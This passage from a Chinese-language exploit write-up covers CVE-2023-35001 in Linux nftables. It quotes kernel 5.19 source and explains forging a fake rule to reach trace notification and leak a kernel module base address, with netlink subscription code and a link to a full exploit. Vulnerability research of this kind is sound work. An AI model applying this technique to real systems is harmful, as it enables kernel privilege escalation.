/* for tracing */ unsigned char data[] __attribute__((aligned(__alignof__(struct nft_expr)))); }; 在进入nf_trace_fill_rule_info函数内部前需要经历规则与表达式的遍历。 File: linux-5.19\net\netfilter\nf_tables_core.c 255: for (; rule < last_rule; rule = nft_rule_next(rule)) { //遍历rule 256: nft_rule_dp_for_each_expr(expr, last, rule) { //遍历expr 257: if (expr->ops == &nft_cmp_fast_ops) 258: nft_cmp_fast_eval(expr, &regs); 259: else if (expr->ops == &nft_cmp16_fast_ops) 260: nft_cmp16_fast_eval(expr, &regs); 261: else if (expr->ops == &nft_bitwise_fast_ops) 262: nft_bitwise_fast_eval(expr, &regs); 263: else if (expr->ops != &nft_payload_fast_ops || 264: !nft_payload_fast_eval(expr, &regs, pkt)) 265: expr_call_ops_eval(expr, &regs, pkt); //执行expr->ops 266: 267: if (regs.verdict.code != NFT_CONTINUE) 268: break; 269: } 270: 271: switch (regs.verdict.code) { 272: case NFT_BREAK: 273: regs.verdict.code = NFT_CONTINUE; 274: nft_trace_copy_nftrace(&info); 275: continue; 276: case NFT_CONTINUE: 277: nft_trace_packet(&info, chain, rule, 278: NFT_TRACETYPE_RULE); //跟踪数据包 279: continue; 280: } 281: break; 282: 遍历规则的宏定义如下，若是rule->dlen没有进行改写，那么会根据rule->dlen找到下一个rule，但是当前的rule是伪造的，因此会导致在取出expr会报错。倘若将rule->dlen修改为0，则下个rule的位置就是当前rule + 8。由于不定长数组unsigned char data[]，在sizeof操作中的值为0，因此sizeof(*rule)的值为8。此时将last_rule改写成rule + 8就可以直接跳出循环。 #define nft_rule_next(rule) (void *)rule + sizeof(*rule) + rule->dlen 在完场上述流程后，就可以顺利进入nft_trace_packet函数内部，nft_trace_packet函数也比较简单，实际是调用了__nft_trace_packet函数 File: linux-5.19\net\netfilter\nf_tables_core.c 37: static inline void nft_trace_packet(struct nft_traceinfo *info, 38: const struct nft_chain *chain, 39: const struct nft_rule_dp *rule, 40: enum nft_trace_types type) 41: { 42: if (static_branch_unlikely(&nft_trace_enabled)) { 43: const struct nft_pktinfo *pkt = info->pkt; 44: 45: info->nf_trace = pkt->skb->nf_trace; 46: info->rule = rule; 47: __nft_trace_packet(info, chain, type); 48: } 49: } 可以发现想要进入nft_trace_notify函数需要满足info->trace或info->trace不为空。 File: linux-5.19\net\netfilter\nf_tables_core.c 24: static noinline void __nft_trace_packet(struct nft_traceinfo *info, 25: const struct nft_chain *chain, 26: enum nft_trace_types type) 27: { 28: if (!info->trace || !info->nf_trace) 29: return; 30: 31: info->chain = chain; 32: info->type = type; 33: 34: nft_trace_notify(info); 35: } 使用meta表达式可以设置skb->nf_trace，将skb->nf_trace设置为非空就可以进入到nft_trace_notify函数。 File: linux-5.19\net\netfilter\nft_meta.c ... 443: case NFT_META_NFTRACE: 444: value8 = nft_reg_load8(sreg); 445: 446: skb->nf_trace = !!value8; 447: break; ... 在nft_trace_notify函数内部，还会判断是否订阅NFNLGRP_NFTRACE。没订阅则无法继续执行。 File: linux-5.19\net\netfilter\nf_tables_trace.c ... 176: if (!nfnetlink_has_listeners(nft_net(pkt), NFNLGRP_NFTRACE)) 177: return; ... 在libnml库中使用mnl_socket_setsockopt函数进行netlink的组订阅，由于在使用宏NFNLGRP_NFTRACE编译时会提示找不到该值，因此这里使用实际值代替了。 static int group = 9; if (mnl_socket_setsockopt(nleak, NETLINK_ADD_MEMBERSHIP, &group, sizeof(int)) < 0) { perror("mnl_socket_setsockopt"); exit(EXIT_FAILURE); } 接下来就需要具体如何伪造rule，通过byteorder操作可以首先可以将原先的chain、rule以及last_rule的地址泄露，但是只能泄露四字节。由于我们需要找到符合上述条件的rule，并且我们只有rule的最低两个字节，因此搜索范围不大，因此需要在泄露的rule_low附近寻找一个合适的模块地址。在存储泄露的rule之前存储利用immediate以及meta_set操作，我们选择其中一个进行泄露即可。伪造的方式也比较简单，由于is_last与dlen都需要设置为0，因此我们只需要找到两个字节为0的值，作为伪造的rule即可，伪造的rule如下。修改后的结果如下由于handle实际是占用42比特，但是有3个比特被设置为0了，因此实际泄露的值只有39比特，但是由于模块地址的高4个字节都是固定的0xffffffff，因此不影响模块地址的泄露。通过从数据包中提取数据得到handle的值为后，简单移位操作就可以还原。 module = ((leak << 13) >> 16); 最后泄露模块基地址成功。总结总结一下模块基地址的泄露流程 1. 构造基础链设置NFT_JUMP表达式通过meta设置为NFT_META_NFTRACE 2. 泄露链 byteorder表达式触发漏洞，第一次读chain、rule以及last_rule，第二次改写为chain，fake rule以及fake last_rule dynset表达式泄露chain、rule、last_rule 3. 订阅NFNLGRP_NFTRACE组，接收数据包 4. 后续接着分享如何绕过kaslr以及最终提权的利用。原版exp使用go语言写的，我使用c语言重写了一版。完整exp：https://github.com/h0pe-ay/Vulnerability-Reproduction/tree/master/CVE-2023-35001(nftables)（c语言）

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页